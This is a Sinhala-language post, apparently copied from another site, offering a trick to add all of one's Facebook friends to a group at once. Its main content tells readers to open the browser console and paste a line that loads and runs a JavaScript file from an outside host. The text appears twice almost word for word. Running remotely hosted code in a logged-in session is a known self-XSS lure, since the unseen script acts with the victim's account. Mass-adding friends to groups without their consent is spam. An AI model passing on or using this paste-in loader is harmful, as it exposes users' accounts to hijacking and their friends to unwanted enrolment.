මුහුණු පොතේ මිතුරන් ඔක්කෝම එකපාරම ෆේස්බු
ඔන්න ටොප් වැඩක් ගැන තමා මේ කියන්න යන්නේ. අපි සාමාන්‍යයෙන් ෆේස්බුක් ගෘප් එකකට මෙම්බර්ස්ලා ඇඩ්කරගන්න හෙන කට්ටක් කනවනේ..
සමහර අය දවස්ගානක් ට්‍රයි කරලත් හරියට ගෘප් එකකට මෙම්බර්ස්ල ඇඩ්කරගන්න බෑ. 1000 – 5000 අතර වගේ ප්‍රමාණයක් මෙම්බර්ස්ල ඉන්න ගෘප් තමා වැඩියෙන්ම තියෙන්නේ.. ඉතින් අපි එහෙව් කට්ටක් නොකා ජාවා ස්ක්‍රීප්ට් එකකින් ඔබේ මුහුණු පොතේ මිතුරන් ඔක්කෝම එකපාරම ෆේස්බුක් ගෘප් එකට පටස් ගාලා ඇඩ් කොරගන්න පුළුවන්.
අද මම මේ කියන්න යන්නේ ඒ ගැනයි.
හැබැයි මේකෙදී අපිට පොඩ්ඩක් ඉවසීම අවශ්‍යයි. මොකද යම් තරමක වෙලාවක් ගතවෙන නිසා. ෆේන්ඩ්ල 5000 ඉන්න ඇකවුන්ට් එකකින් විනාඩි 5-10 ක් ඇතුළත ෆේන්ඩලා සියල්ලම ගෘප් එකට ඇඩ් කරගන්න පුළුවන්. ඇයි දෙයියනේ අකුරෙන් අකුර ටයිප් කොර කොර යාලුවන්ව ඇඩ් කොරන්න කාපු කට්ටේ හැටියට ඔය පුංචි විනාඩි කිහිපය මහා දෙයක් නෙවෙයිනේ.. ගෘප් එකේ ඇඩ්මින් ගොයියට විතරක් නෙවෙයි ඕනෑම සාමාජිකයෙකුට පුළුවන් මේ ස්ක්‍රිප්ට් එක බාවිතයෙන් ඔවුන්ගේ මිතුරන්ව ඔබේ ගෘප් එකට එකතු කොරන්න. කියන විදියටනම් වැඩේ මරු වගේ නේ.. ඔවු කෙරුවාවෙනුත් මේ වැඩේ හරිම අපුරුයි ඈ.. බලමුකෝ එහෙනම් මේ සිංපල් ප්ලෑන ගැන.. ඒනන් වැඩේට සම්ප්‍රාප්ත වෙමු.
මුලින්ම ඔබට මිතුරන්ව එකතු කරන්න ඔනාකරන ඔබේ Group එකට යන්න. ගිහින් පල්ලෙහා දීලා තියෙන උපදෙස් අනුව ගිහින් වැඩේ ගොඩදාගන්න.
Google Chrome භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..
1. කොහේ හෝ right click කරන්න.
2. “Inspect Element” යන්න තෝරා “Console” තෝරන්න.
3. පහත දී තිබෙන script code එක copy/paste කරන්න.
Mozilla Firefox භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..
1. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
2. පහත දී තිබෙන script code එක copy/paste කරන්න.
ඊට පස්සේ Enter key එක ඔබන්න.
උස්සලා දැම්මේ
ඔන්න ටොප් වැඩක් ගැන තමා මේ කියන්න යන්නේ. අපි සාමාන්‍යයෙන් ෆේස්බුක් ගෘප් එකකට මෙම්බර්ස්ලා ඇඩ්කරගන්න හෙන කට්ටක් කනවනේ..
සමහර අය දවස්ගානක් ට්‍රයි කරලත් හරියට ගෘප් එකකට මෙම්බර්ස්ල ඇඩ්කරගන්න බෑ. 1000 – 5000 අතර වගේ ප්‍රමාණයක් මෙම්බර්ස්ල ඉන්න ගෘප් තමා වැඩියෙන්ම තියෙන්නේ.. ඉතින් අපි එහෙව් කට්ටක් නොකා ජාවා ස්ක්‍රීප්ට් එකකින් ඔබේ මුහුණු පොතේ මිතුරන් ඔක්කෝම එකපාරම ෆේස්බුක් ගෘප් එකට පටස් ගාලා ඇඩ් කොරගන්න පුළුවන්.
අද මම මේ කියන්න යන්නේ ඒ ගැනයි.හැබැයි මේකෙදී අපිට පොඩ්ඩක් ඉවසීම අවශ්‍යයි. මොකද යම් තරමක වෙලාවක් ගතවෙන නිසා. ෆේන්ඩ්ල 5000 ඉන්න ඇකවුන්ට් එකකින් විනාඩි 5-10 ක් ඇතුළත ෆේන්ඩලා සියල්ලම ගෘප් එකට ඇඩ් කරගන්න පුළුවන්. ඇයි දෙයියනේ අකුරෙන් අකුර ටයිප් කොර කොර යාලුවන්ව ඇඩ් කොරන්න කාපු කට්ටේ හැටියට ඔය පුංචි විනාඩි කිහිපය මහා දෙයක් නෙවෙයිනේ.. ගෘප් එකේ ඇඩ්මින් ගොයියට විතරක් නෙවෙයි ඕනෑම සාමාජිකයෙකුට පුළුවන් මේ ස්ක්‍රිප්ට් එක බාවිතයෙන් ඔවුන්ගේ මිතුරන්ව ඔබේ ගෘප් එකට එකතු කොරන්න. කියන විදියටනම් වැඩේ මරු වගේ නේ.. ඔවු කෙරුවාවෙනුත් මේ වැඩේ හරිම අපුරුයි ඈ.. බලමුකෝ එහෙනම් මේ සිංපල් ප්ලෑන ගැන.. ඒනන් වැඩේට සම්ප්‍රාප්ත වෙමු.
මුලින්ම ඔබට මිතුරන්ව එකතු කරන්න ඔනාකරන ඔබේ Group එකට යන්න. ගිහින් පල්ලෙහා දීලා තියෙන උපදෙස් අනුව ගිහින් වැඩේ ගොඩදාගන්න.
Google Chrome භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..
1. කොහේ හෝ right click කරන්න.
2. “Inspect Element” යන්න තෝරා “Console” තෝරන්න.
3. පහත දී තිබෙන script code එක copy/paste කරන්න.
PHP:
document.body.appendChild(document.createElement('script')).src='http://yesican.loomhost.com/autoinvite.js';
Mozilla Firefox භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..
1. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
2. පහත දී තිබෙන script code එක copy/paste කරන්න.
Code:
document.body.appendChild(document.createElement('script')).src='http://yesican.loomhost.com/autoinvite.js';
ඊට පස්සේ Enter key එක ඔබන්න.
උස්සලා දැම්මේ